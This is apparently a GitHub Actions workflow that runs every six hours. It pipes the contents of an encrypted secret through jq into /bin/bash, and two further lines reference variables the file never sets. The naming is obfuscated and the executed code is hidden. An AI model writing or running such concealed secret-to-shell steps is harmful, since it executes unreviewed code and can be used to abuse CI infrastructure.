name: dongtaigh
on:
  workflow_dispatch:
  schedule:
    - cron: '20 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongtaigh
        env:
          cmj8: ${{ secrets.cmj8 }}
        run: |
          echo $cmj8 | jq -r .cvz7 | /bin/bash
          echo $zhz542 | jq -r .tugg922 | /bin/bash
          echo $eh1 | jq -r .c85 | /bin/bash

